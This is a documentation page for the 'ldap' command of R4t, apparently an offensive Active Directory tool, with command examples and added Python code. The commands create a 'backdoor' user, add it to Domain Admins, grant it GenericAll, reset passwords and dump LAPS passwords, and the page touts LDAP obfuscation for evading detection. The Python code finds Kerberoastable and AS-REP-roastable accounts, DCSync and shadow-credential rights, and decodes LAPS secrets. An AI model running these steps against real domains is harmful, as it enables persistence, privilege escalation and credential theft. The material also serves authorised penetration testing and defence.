Documentation Index
Fetch the complete documentation index at: https://wiki.krkn.tech/llms.txt
Use this file to discover all available pages before exploring further.
ldap
The ldap command is R4t’s primary interface for interacting with Active Directory via the Lightweight Directory Access Protocol. It supports enumeration, modification, object creation and deletion, vulnerability scanning, DACL manipulation, GPO management, and LAPS interaction.
All ldap subcommands use the global authentication and connection flags.
Usage
r4t ldap <subcommand> [flags]
Subcommands
ldap get
Query and retrieve AD objects.
r4t ldap get <object-type> [flags]
Object Types
| Type | Description |
|---|---|
| user | Single user by samAccountName, DN, or UPN |
| users | All domain user accounts |
| computer | Single computer account |
| computers | All computer accounts |
| group | Single group by name or DN |
| groups | All security and distribution groups |
| ou | Single Organizational Unit |
| ous | All Organizational Units |
| maq | Machine Account Quota for the domain |
| spn | All accounts with Service Principal Names |
| desc | Accounts with interesting strings in the description field |
Common Flags
| Flag | Description |
|---|---|
| --name | Filter by samAccountName, CN, or DN |
| --output, -o | Write results to file |
| --raw | Output raw LDAP attributes |
Examples
# List all users
r4t ldap get users
# Get a single user
r4t ldap get user --name jsmith
# List all computers
r4t ldap get computers
# Find accounts with SPNs (Kerberoastable)
r4t ldap get spn
# Find accounts with interesting description strings
r4t ldap get desc
ldap create
Create new AD objects.
r4t ldap create <object-type> [flags]
Object Types
| Type | Description |
|---|---|
| user | Create a new user account |
| computer | Create a new computer account |
| group | Create a new security group |
| group-member | Add a member to an existing group |
| ou | Create a new Organizational Unit |
Examples
# Create a user
r4t ldap create user --name backdoor --password 'P@ssword1' --ou "CN=Users,DC=corp,DC=example,DC=com"
# Create a computer account
r4t ldap create computer --name FAKEPC
# Add user to group
r4t ldap create group-member --group "Domain Admins" --member "CN=backdoor,CN=Users,DC=corp,DC=example,DC=com"
# Create an OU
r4t ldap create ou --name "Staging" --parent "DC=corp,DC=example,DC=com"
ldap delete
Delete AD objects.
r4t ldap delete <object-type> [flags]
Object Types
| Type | Description |
|---|---|
| user | Delete a user account |
| computer | Delete a computer account |
| group-member | Remove a member from a group |
| ou | Delete an Organizational Unit |
ldap modify
Modify attributes on an existing AD object.
| Flag | Description |
|---|---|
| --dn | Distinguished Name of the object to modify |
| --attribute | LDAP attribute name to change |
| --value | New value for the attribute |
| --add | Add the attribute value (rather than replace) |
| --delete | Delete the attribute value |
Examples
# Set an arbitrary attribute
r4t ldap modify --dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com" --attribute description --value "Test account"
# Add an SPN
r4t ldap modify --dn "CN=svcApp,CN=Users,DC=corp,DC=example,DC=com" --attribute servicePrincipalName --value "HTTP/app.corp.example.com" --add
ldap enable
Re-enable a disabled AD object.
r4t ldap enable <object-type> [flags]
Object Types
| Type | Description |
|---|---|
| user | Enable a disabled user account |
| computer | Enable a disabled computer account |
ldap password
Reset or change an account password.
r4t ldap password [flags]
| Flag | Description |
|---|---|
| --target-user | The user whose password to change |
| --new-password | The new password to set |
| --old-password | Current password (required for self-service change) |
Examples
# Administrative reset (requires the Reset Password extended right on the target; no old password needed, logged on the DC as a reset, event 4724, rather than a change, event 4723)
r4t ldap password --target-user jsmith --new-password 'NewP@ss!'
# Self-service change (requires the old password; the DC enforces password policy, including minimum password age)
r4t ldap password --target-user jsmith --old-password 'OldP@ss' --new-password 'NewP@ss!'
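The difference between the two forms, and between the --add / --delete / replace modes of ldap modify, is a difference in the LDAP modify operations sent to the domain controller. The following is an added illustration, not R4t's code: it builds the operation lists in the shape the ldap3 library's `Connection.modify()` accepts (the operation names and the `{attribute: [(op, [values])]}` layout are ldap3's; nothing here is taken from el-dap) and encodes `unicodePwd` the way Active Directory requires.

```python
"""Added example: the LDAP modify operations behind 'ldap modify' and 'ldap password'.

Illustrative code (not r4t's). The change-list layout mirrors the ldap3 library's
Connection.modify(dn, changes) so the wire-level difference between an administrative
reset and a self-service change is visible.
"""
MODIFY_ADD, MODIFY_DELETE, MODIFY_REPLACE = "MODIFY_ADD", "MODIFY_DELETE", "MODIFY_REPLACE"


def modify_ops(attribute, value, add=False, delete=False):
    """Map the --add / --delete flags onto one LDAP modify operation (default: replace)."""
    if add and delete:
        raise ValueError("--add and --delete are mutually exclusive")
    op = MODIFY_ADD if add else MODIFY_DELETE if delete else MODIFY_REPLACE
    return {attribute: [(op, [value])]}


def encode_unicode_pwd(password):
    """AD accepts unicodePwd only as UTF-16LE with the password wrapped in double quotes."""
    return f'"{password}"'.encode("utf-16-le")


def check_transport(server_url, start_tls=False):
    """Password writes must arrive over TLS (LDAPS or StartTLS); otherwise the DC
    rejects the modify with unwillingToPerform. Raise early instead of failing late."""
    if not (server_url.lower().startswith("ldaps://") or start_tls):
        raise RuntimeError("unicodePwd can only be set over an encrypted connection")
    return True


def password_reset(new_password):
    """Administrative reset: a single replace. Needs the Reset Password extended right
    on the target and bypasses the old-password check and minimum password age."""
    return {"unicodePwd": [(MODIFY_REPLACE, [encode_unicode_pwd(new_password)])]}


def password_change(old_password, new_password):
    """Self-service change: delete the old value and add the new one in ONE modify.
    The DC verifies the old value and enforces the password policy."""
    return {"unicodePwd": [(MODIFY_DELETE, [encode_unicode_pwd(old_password)]),
                           (MODIFY_ADD, [encode_unicode_pwd(new_password)])]}


if __name__ == "__main__":
    check_transport("ldaps://dc01.corp.example.com")
    print(modify_ops("servicePrincipalName", "HTTP/app.corp.example.com", add=True))
    print(password_reset("NewP@ss!"))
    print(password_change("OldP@ss", "NewP@ss!"))
```

With ldap3 the returned dictionaries would be passed as `conn.modify(dn, changes)`; the two `unicodePwd` operations of a change must travel in the same modify request, since a standalone delete of `unicodePwd` is refused.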
ldap query
Execute a raw LDAP search query.
| Flag | Description |
|---|---|
| --filter | LDAP search filter (e.g., (objectClass=user)) |
| --attributes | Comma-separated list of attributes to return |
| --base | Search base DN (defaults to domain root) |
| --scope | Search scope: base, one, sub (default: sub) |
| --output, -o | Write results to file |
Examples
# Find all enabled users with passwords that never expire
r4t ldap query --filter "(&(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(userAccountControl:1.2.840.113556.1.4.803:=65536))"
# Get specific attributes for all computers
r4t ldap query --filter "(objectClass=computer)" --attributes "name,operatingSystem,dnshostname,lastlogontimestamp"
# Search within a specific OU
r4t ldap query --filter "(objectClass=user)" --base "OU=Employees,DC=corp,DC=example,DC=com"
ldap scan
Scan for AD vulnerabilities and misconfigurations.
This subcommand performs a broad vulnerability scan of the AD environment and populates the database with findings. It checks for:
- Accounts that do not require Kerberos pre-authentication (AS-REP roastable)
- Accounts with SPNs (Kerberoastable)
- DCSync-capable accounts (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object)
- Shadow credential opportunities (writable msDS-KeyCredentialLink)
- Coercible hosts
- Password policy weaknesses
- Domain functional level issues
- Delegation misconfigurations (unconstrained, constrained, resource-based)
- Pre-Windows 2000 Compatible Access
- noPac-vulnerable accounts
| Flag | Description |
|---|---|
| --output, -o | Write scan results to file |
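Most of the account-level checks above, and the ldap query example with the bitwise userAccountControl match, reduce to LDAP filters. The following added example (illustrative code, not R4t's or el-dap's implementation) spells those filters out and runs them through a small RFC 4515 evaluator against constructed directory entries, so you can see why each clause is there; the flag values and the matching-rule OID are the standard Active Directory ones, the entries are made up.

```python
"""Added example: the LDAP filters behind common AD checks, with an offline evaluator.

Illustrative code, not r4t's. userAccountControl bit values, the bit-AND matching
rule OID and the filter syntax are standard AD/LDAP; the sample entries are constructed.
"""

# userAccountControl flags used by the checks (standard AD values)
UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_EXPIRE_PASSWORD = 0x10000
UAC_TRUSTED_FOR_DELEGATION = 0x80000     # unconstrained delegation
UAC_DONT_REQ_PREAUTH = 0x400000          # AS-REP roastable

BITAND = "1.2.840.113556.1.4.803"        # LDAP_MATCHING_RULE_BIT_AND


def uac_set(flag):
    return f"(userAccountControl:{BITAND}:={flag})"


def uac_clear(flag):
    return f"(!{uac_set(flag)})"


ENABLED = uac_clear(UAC_ACCOUNTDISABLE)

# objectCategory=person excludes computer objects, which also carry objectClass=user
FILTERS = {
    "asrep_roastable": f"(&(objectClass=user)(objectCategory=person){ENABLED}{uac_set(UAC_DONT_REQ_PREAUTH)})",
    "kerberoastable": f"(&(objectClass=user)(objectCategory=person)(servicePrincipalName=*)"
                      f"(!(samAccountName=krbtgt)){ENABLED})",
    "unconstrained_delegation": f"(&(objectClass=computer){uac_set(UAC_TRUSTED_FOR_DELEGATION)})",
    # same filter as the 'ldap query' example on this page
    "password_never_expires": f"(&(objectClass=user){ENABLED}{uac_set(UAC_DONT_EXPIRE_PASSWORD)})",
}


def _parse(s, i=0):
    """Recursive-descent parse of an RFC 4515 filter (no value escaping needed here)."""
    assert s[i] == "("
    i += 1
    if s[i] in "&|!":
        op, kids, i = s[i], [], i + 1
        while s[i] == "(":
            node, i = _parse(s, i)
            kids.append(node)
        return (op, kids), i + 1            # skip the closing ')'
    j = s.index(")", i)
    attr, value = s[i:j].split("=", 1)
    return ("=", attr, value), j + 1


def _get(entry, attr):
    """LDAP attribute names are case-insensitive."""
    for k, v in entry.items():
        if k.lower() == attr.lower():
            return v
    return None


def _matches(node, entry):
    op = node[0]
    if op == "&":
        return all(_matches(k, entry) for k in node[1])
    if op == "|":
        return any(_matches(k, entry) for k in node[1])
    if op == "!":
        return not _matches(node[1][0], entry)
    _, attr, value = node
    if attr.endswith(f":{BITAND}:"):        # extensible match: every bit in value must be set
        actual = _get(entry, attr[: -len(BITAND) - 2])
        return actual is not None and (int(actual) & int(value)) == int(value)
    actual = _get(entry, attr)
    if actual is None:
        return False
    if value == "*":                         # presence filter
        return True
    values = actual if isinstance(actual, list) else [actual]
    return any(str(v).lower() == value.lower() for v in values)


def search(entries, filter_string):
    tree, end = _parse(filter_string)
    assert end == len(filter_string), "trailing garbage in filter"
    return [e for e in entries if _matches(tree, e)]


def run_checks(entries):
    return {name: sorted(_get(e, "sAMAccountName") for e in search(entries, f))
            for name, f in FILTERS.items()}


# Constructed entries. In AD objectCategory is a schema DN; the short class name is
# stored here because (objectCategory=person) is how the filter is written either way.
def _user(name, uac, spn=None):
    e = {"sAMAccountName": name, "objectClass": ["top", "person", "organizationalPerson", "user"],
         "objectCategory": "person", "userAccountControl": uac}
    if spn:
        e["servicePrincipalName"] = spn
    return e


def _computer(name, uac, spn):
    return {"sAMAccountName": name, "objectCategory": "computer", "userAccountControl": uac,
            "objectClass": ["top", "person", "organizationalPerson", "user", "computer"],
            "servicePrincipalName": spn}


SAMPLE_ENTRIES = [
    _user("jsmith", 512),
    _user("svc_sql", 512 | UAC_DONT_EXPIRE_PASSWORD, ["MSSQLSvc/sql01.corp.example.com:1433"]),
    _user("legacyapp", 512 | UAC_DONT_REQ_PREAUTH),
    _user("olduser", 512 | UAC_ACCOUNTDISABLE | UAC_DONT_REQ_PREAUTH),   # disabled: not roastable
    _user("krbtgt", 512 | UAC_ACCOUNTDISABLE, ["kadmin/changepw"]),
    _computer("DC01$", 8192 | UAC_TRUSTED_FOR_DELEGATION, ["ldap/dc01.corp.example.com"]),
    _computer("WS01$", 4096, ["HOST/ws01.corp.example.com"]),
]

if __name__ == "__main__":
    for name, hits in run_checks(SAMPLE_ENTRIES).items():
        print(f"{name:26s} {FILTERS[name]}\n{'':26s} -> {hits}")
```

The disabled `olduser` and the `DC01$` computer object (which has SPNs and `objectClass=user` like every computer) show why the enabled-only and `objectCategory=person` clauses matter; without them a Kerberoast sweep returns every machine account.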
ldap recon
Full domain reconnaissance — enumerates users, computers, groups, OUs, GPOs, trusts, domain controllers, and password policies, storing everything in the database.
| Flag | Description |
|---|---|
| --output, -o | Output directory for results |
This is typically the first command run after gaining credentials. It populates the full local database for offline analysis.
ldap dacl
Enumerate and modify Discretionary Access Control Lists (DACLs) on AD objects.
r4t ldap dacl <subcommand> [flags]
Subcommands
| Subcommand | Description |
|---|---|
| get | Enumerate DACL ACEs on an object |
| add | Add an ACE to an object’s DACL |
| remove | Remove an ACE from an object’s DACL |
| Flag | Description |
|---|---|
| --dn | Target object DN |
| --trustee | Account to grant/revoke rights to |
| --right | AD right (e.g., GenericAll, WriteProperty, ResetPassword) |
Examples
# View ACL on an object
r4t ldap dacl get --dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com"
# Grant GenericAll to a controlled account
r4t ldap dacl add --dn "CN=Domain Admins,CN=Users,DC=corp,DC=example,DC=com" \
--trustee "CN=backdoor,CN=Users,DC=corp,DC=example,DC=com" --right GenericAll
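Whether a DACL entry is worth anything depends on the access-mask bits together with the object GUID the ACE is scoped to: `WriteProperty` on the `member` attribute is group control, `ControlAccess` on the User-Force-Change-Password right is a password reset, and the two replication rights together are DCSync. The following added example (illustrative code, not R4t's or el-dap's) parses a DACL in SDDL form and classifies each allow ACE that way; the right codes and GUIDs are the documented Windows/AD values, the SDDL string and SIDs are constructed.

```python
"""Added example: parse an SDDL DACL and flag ACEs that give a trustee abusable control.

Illustrative code, not r4t's. Right codes come from sddl.h / ADS_RIGHT_ENUM and the
GUIDs are the well-known AD schema / extended-right identifiers; the DACL is constructed.
"""
import re
from dataclasses import dataclass

RIGHTS = {   # SDDL two-letter right code -> access-mask bit
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100,
}
GUID_FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"   # User-Force-Change-Password
GUID_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"        # DS-Replication-Get-Changes
GUID_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"    # DS-Replication-Get-Changes-All
GUID_MEMBER = "bf9679c0-0de6-11d0-a285-00aa003049e2"                  # member attribute
GUID_KEY_CREDENTIAL_LINK = "5b47d60f-6090-40b2-9f37-2a4de88f3063"     # msDS-KeyCredentialLink


@dataclass
class Ace:
    ace_type: str        # A = allow, D = deny, OA / OD = object-specific allow / deny
    flags: str           # inheritance flags (CI, OI, ID, ...)
    mask: int
    object_guid: str     # attribute / extended right the ACE is limited to ("" = whole object)
    inherit_guid: str
    trustee: str         # SID or SDDL alias such as DA, AU


def parse_rights(field):
    """Rights appear either as a hex mask or as concatenated two-letter codes."""
    if field.startswith("0x"):
        return int(field, 16)
    return sum(RIGHTS[field[i:i + 2]] for i in range(0, len(field), 2))


def parse_sddl_dacl(sddl):
    m = re.search(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)      # D:<flags>(ace)(ace)...
    if not m:
        raise ValueError("no DACL section in SDDL string")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(2)):
        t, fl, rights, og, ig, sid = body.split(";")
        aces.append(Ace(t, fl, parse_rights(rights), og.lower(), ig.lower(), sid))
    return aces


def dangerous_rights(sddl):
    """Map trustee -> set of abuse primitives granted by allow ACEs in the DACL."""
    findings = {}
    for ace in parse_sddl_dacl(sddl):
        if ace.ace_type not in ("A", "OA"):
            continue                     # deny ACEs grant nothing
        got = findings.setdefault(ace.trustee, set())
        m, g = ace.mask, ace.object_guid
        if m & RIGHTS["GA"]:
            got.add("GenericAll")
        if m & RIGHTS["WD"]:
            got.add("WriteDacl")
        if m & RIGHTS["WO"]:
            got.add("WriteOwner")
        if m & (RIGHTS["GW"] | RIGHTS["WP"]) and not g:
            got.add("WriteAllProperties")
        if m & RIGHTS["WP"] and g == GUID_MEMBER:
            got.add("AddMember")
        if m & RIGHTS["WP"] and g == GUID_KEY_CREDENTIAL_LINK:
            got.add("AddKeyCredentialLink")        # shadow credentials
        if m & RIGHTS["CR"] and not g:
            got.add("AllExtendedRights")           # on the domain object this includes DCSync
        if m & RIGHTS["CR"] and g == GUID_FORCE_CHANGE_PASSWORD:
            got.add("ForceChangePassword")
        if m & RIGHTS["CR"] and g == GUID_REPL_GET_CHANGES:
            got.add("DS-Replication-Get-Changes")
        if m & RIGHTS["CR"] and g == GUID_REPL_GET_CHANGES_ALL:
            got.add("DS-Replication-Get-Changes-All")
    for got in findings.values():          # DCSync needs both replication rights
        if {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"} <= got:
            got.add("DCSync")
    return {sid: got for sid, got in findings.items() if got}


SID_PREFIX = "S-1-5-21-1004336348-1177238915-682003330-"   # constructed domain SID
SAMPLE_SDDL = (                                              # constructed DACL
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;LCRPLORC;;;AU)"
    f"(OA;;CR;{GUID_FORCE_CHANGE_PASSWORD};;{SID_PREFIX}1105)"
    f"(OA;;WP;{GUID_KEY_CREDENTIAL_LINK};;{SID_PREFIX}1106)"
    f"(OA;;CR;{GUID_REPL_GET_CHANGES};;{SID_PREFIX}1107)"
    f"(OA;;CR;{GUID_REPL_GET_CHANGES_ALL};;{SID_PREFIX}1107)"
    f"(A;;GA;;;{SID_PREFIX}1108)"
)

if __name__ == "__main__":
    for sid, rights in dangerous_rights(SAMPLE_SDDL).items():
        print(sid, sorted(rights))
```

Resolving SIDs to names and walking group nesting is left to the database; the point here is that `dacl add --right GenericAll` lands as a `GA` allow ACE, and that a `CR` ACE is only a password reset or DCSync when its object GUID says so.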
ldap gplink
Manage Group Policy Object links to containers (OUs, domains, sites).
r4t ldap gplink <subcommand> [flags]
Subcommands
| Subcommand | Description |
|---|---|
| add | Link a GPO to a container |
| remove | Unlink a GPO from a container |
| list | List all GPO links |
ldap laps
Interact with LAPS (Local Administrator Password Solution).
| Flag | Description |
|---|---|
| --computer | Target computer name |
| --all | Retrieve LAPS passwords for all computers |
| --output, -o | Write results to file |
Reads the ms-Mcs-AdmPwd attribute (legacy LAPS v1) and the msLAPS-Password attribute (Windows LAPS, a JSON blob holding the managed account name, update time and password) from computer objects. AD omits attributes the bound account is not allowed to read, so computers you lack rights on simply return nothing rather than an error. Windows LAPS can also store the secret encrypted in msLAPS-EncryptedPassword (readable only by the configured decryptor), which is not among the attributes listed above.
Examples
# Get LAPS password for a specific computer
r4t ldap laps --computer WS01
# Dump LAPS passwords for all computers you can read
r4t ldap laps --all
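What comes back from those attributes differs between the two LAPS generations: legacy LAPS stores the bare password, Windows LAPS a JSON blob with the account name, a hex FILETIME and the password, and both expose the expiry as a decimal FILETIME. The following added example (illustrative code, not R4t's) decodes all of these from already-fetched computer objects; the attribute names and the JSON keys are the real ones, the computer records and passwords are constructed.

```python
"""Added example: decoding the LAPS attributes found on AD computer objects.

Illustrative code, not r4t's. Attribute names and the Windows LAPS JSON layout
({"n": account, "t": hex FILETIME, "p": password}) are the real ones; the records
below are constructed.
"""
import json
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME = 100-ns ticks since 1601-01-01 UTC; AD returns it as a decimal string."""
    return FILETIME_EPOCH + timedelta(microseconds=int(ft) // 10)


def _expiry(value):
    return filetime_to_datetime(value) if value else None


def decode_laps(name, attrs):
    """Return the LAPS secret readable on one computer, or None if nothing was returned.

    A missing attribute means 'no read access or LAPS not deployed', not an empty
    password: the DC silently drops attributes the bound account may not read.
    """
    if "msLAPS-Password" in attrs:                       # Windows LAPS, plaintext JSON
        blob = json.loads(attrs["msLAPS-Password"])
        return {"computer": name, "source": "Windows LAPS", "account": blob["n"],
                "password": blob["p"], "updated": filetime_to_datetime(int(blob["t"], 16)),
                "expires": _expiry(attrs.get("msLAPS-PasswordExpirationTime"))}
    if "ms-Mcs-AdmPwd" in attrs:                         # legacy LAPS v1
        return {"computer": name, "source": "LAPS v1", "account": None,
                "password": attrs["ms-Mcs-AdmPwd"], "updated": None,
                "expires": _expiry(attrs.get("ms-Mcs-AdmPwdExpirationTime"))}
    if "msLAPS-EncryptedPassword" in attrs:              # Windows LAPS with encryption
        # DPAPI-NG blob bound to the authorized decryptor; readable but not usable without that key
        return {"computer": name, "source": "Windows LAPS (encrypted)", "account": None,
                "password": None, "updated": None,
                "expires": _expiry(attrs.get("msLAPS-PasswordExpirationTime"))}
    return None


def dump_laps(computers):
    """Equivalent of a --all sweep over already-fetched computer objects."""
    return [row for row in (decode_laps(n, a) for n, a in computers.items()) if row]


SAMPLE_COMPUTERS = {   # constructed; none of these are real secrets
    "WS01": {"msLAPS-Password": '{"n":"Administrator","t":"1da000000000000","p":"Lz4)vK8!pQ2m"}',
             "msLAPS-PasswordExpirationTime": "133445058960850944"},
    "WS02": {"ms-Mcs-AdmPwd": "q7T$wM2#rB9n",
             "ms-Mcs-AdmPwdExpirationTime": "133445058960850944"},
    "SRV03": {"msLAPS-EncryptedPassword": b"\x01\x00\x00\x00" + bytes(16),   # placeholder blob
              "msLAPS-PasswordExpirationTime": "133445058960850944"},
    "WS04": {},                                            # no LAPS attributes returned
}

if __name__ == "__main__":
    for row in dump_laps(SAMPLE_COMPUTERS):
        print(row)
```

The `updated` and `expires` timestamps are worth keeping: an expiry in the past means the password on disk may already have rotated, and a very old update time on a machine that should be managed usually means the LAPS client is not running there.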
ldap gpo
Enumerate Group Policy Objects.
| Flag | Description |
|---|---|
| --output, -o | Write results to file |
| --links | Include GPO link information |
ldap gpo — GPO Enumeration Notes
GPO data is stored in the gpos and gp_link_entries tables in the SQLite database after enumeration.
LDAP Obfuscation
R4t uses the el-dap library, which supports LDAP query obfuscation to evade signature-based detection of LDAP queries. Obfuscation is applied transparently for all ldap subcommand operations when configured.